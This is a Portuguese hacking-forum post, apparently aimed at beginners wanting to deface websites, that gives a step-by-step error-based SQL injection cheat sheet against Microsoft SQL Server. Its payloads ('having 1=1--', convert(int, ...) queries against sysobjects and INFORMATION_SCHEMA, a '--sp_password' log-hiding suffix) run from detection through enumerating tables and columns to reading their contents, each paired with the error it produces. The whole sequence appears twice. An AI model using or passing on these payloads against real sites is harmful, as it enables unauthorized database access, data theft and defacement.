E ai galerinha que esta confusa ainda com deface tem umas dicas aqui pra criançada !!
DETECÇÃO
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... having 1=1--
ERRO:
Column '[NOME DA COLUNA]' é inválido na lista de seleção, pois não está contido em uma função agregada e não há nenhuma cláusula
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' having 1=1--
ERRO:
Column '[NOME DA COLUNA]' é inválido na lista de seleção, pois não está contido em uma função agregada e não há nenhuma cláusula
EXTRAIR O USUARIO DATABASE
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[USUÁRIO DO DB]' para uma coluna de dados tipo int.
EXTRAIR A VERSÃO DO DATABASE
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[VERSÃO DO DB]' para uma coluna de dados tipo int.
EXTRAIR O NOME DO SERVE
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DO SERVE]' para uma coluna de dados tipo int.
EXTRAINDO A 1ª TABELA DO DATABASE
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES))
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... convert(int,(select top 1 name from sysobjects where xtype=char(85)))--
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DA TABELA 1]' para uma coluna de dados tipo int
EXTRAINDO A 2ª TABELA DO DATABASE
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('NOME-DA-TABELA-1')))
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... top 1 name from sysobjects where xtype=char(85) and name>'NOME-DA-TABELA-1'))--
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DA TABELA 2]' para uma coluna de dados tipo int.
EXTRAINDO A 3ª TABELA DO DATABASE
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('NOME-DA-TABELA-2')))
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... convert(int,(select top 1 name from sysobjects where xtype=char(85) and name>'NOME-DA-TABELA-2'))--
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DA TABELA 3]' para uma coluna de dados tipo int
EXTRAINDO A 1ª COLUNA DA TABELA
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='NOME-DA-TABELA'))
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... top 1 column_name from DBNAME.information_schema.columns where table_name='NOME-DA-TABELA'))--
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DA COLUNA 1]' para uma coluna de dados tipo int.
EXTRAINDO A 2ª COLUNA DA TABELA
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='NOME-DA-TABELA' and column_name>'NOME-DA-COLUNA-1'))
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... top 1 column_name from DBNAME.information_schema.columns where table_name='NOME-DA-TABELA' and column_name>'NOME-DA-COLUNA-1'))--
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DA COLUNA 2]' para uma coluna de dados tipo int.
EXTRAINDO A 3ª COLUNA DA TABELA
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='NOME-DA-TABELA' and column_name>'NOME-DA-COLUNA-2'))
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... top 1 column_name from DBNAME.information_schema.columns where table_name='NOME-DA-TABELA' and column_name>'NOME-DA-COLUNA-2'))—
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DA COLUNA 3]' para uma coluna de dados tipo int.
LENDO O AS COLUNAS
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... top 1 COLUNA-QUE-VAI-LER from TABELA-1 A order by A.COLUNA-1 desc))--sp_password
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[CONTEUDO DA COLUNA]' para uma coluna de dados tipo int.
DETECÇÃO
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... having 1=1--
ERRO:
Column '[NOME DA COLUNA]' é inválido na lista de seleção, pois não está contido em uma função agregada e não há nenhuma cláusula
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' having 1=1--
ERRO:
Column '[NOME DA COLUNA]' é inválido na lista de seleção, pois não está contido em uma função agregada e não há nenhuma cláusula
EXTRAIR O USUARIO DATABASE
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[USUÁRIO DO DB]' para uma coluna de dados tipo int.
EXTRAIR A VERSÃO DO DATABASE
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[VERSÃO DO DB]' para uma coluna de dados tipo int.
EXTRAIR O NOME DO SERVE
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DO SERVE]' para uma coluna de dados tipo int.
EXTRAINDO A 1ª TABELA DO DATABASE
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES))
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... convert(int,(select top 1 name from sysobjects where xtype=char(85)))--
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DA TABELA 1]' para uma coluna de dados tipo int
EXTRAINDO A 2ª TABELA DO DATABASE
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('NOME-DA-TABELA-1')))
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... top 1 name from sysobjects where xtype=char(85) and name>'NOME-DA-TABELA-1'))--
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DA TABELA 2]' para uma coluna de dados tipo int.
EXTRAINDO A 3ª TABELA DO DATABASE
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('NOME-DA-TABELA-2')))
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... convert(int,(select top 1 name from sysobjects where xtype=char(85) and name>'NOME-DA-TABELA-2'))--
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DA TABELA 3]' para uma coluna de dados tipo int
EXTRAINDO A 1ª COLUNA DA TABELA
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='NOME-DA-TABELA'))
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... top 1 column_name from DBNAME.information_schema.columns where table_name='NOME-DA-TABELA'))--
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DA COLUNA 1]' para uma coluna de dados tipo int.
EXTRAINDO A 2ª COLUNA DA TABELA
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='NOME-DA-TABELA' and column_name>'NOME-DA-COLUNA-1'))
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... top 1 column_name from DBNAME.information_schema.columns where table_name='NOME-DA-TABELA' and column_name>'NOME-DA-COLUNA-1'))--
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DA COLUNA 2]' para uma coluna de dados tipo int.
EXTRAINDO A 3ª COLUNA DA TABELA
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='NOME-DA-TABELA' and column_name>'NOME-DA-COLUNA-2'))
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... top 1 column_name from DBNAME.information_schema.columns where table_name='NOME-DA-TABELA' and column_name>'NOME-DA-COLUNA-2'))—
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[NOME DA COLUNA 3]' para uma coluna de dados tipo int.
LENDO O AS COLUNAS
EXPLOIT:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... top 1 COLUNA-QUE-VAI-LER from TABELA-1 A order by A.COLUNA-1 desc))--sp_password
ERRO:
Erro de sintaxe ao converter o valor nvarchar '[CONTEUDO DA COLUNA]' para uma coluna de dados tipo int.
Creditos: d1r3ct0ry-h4x0r
Comment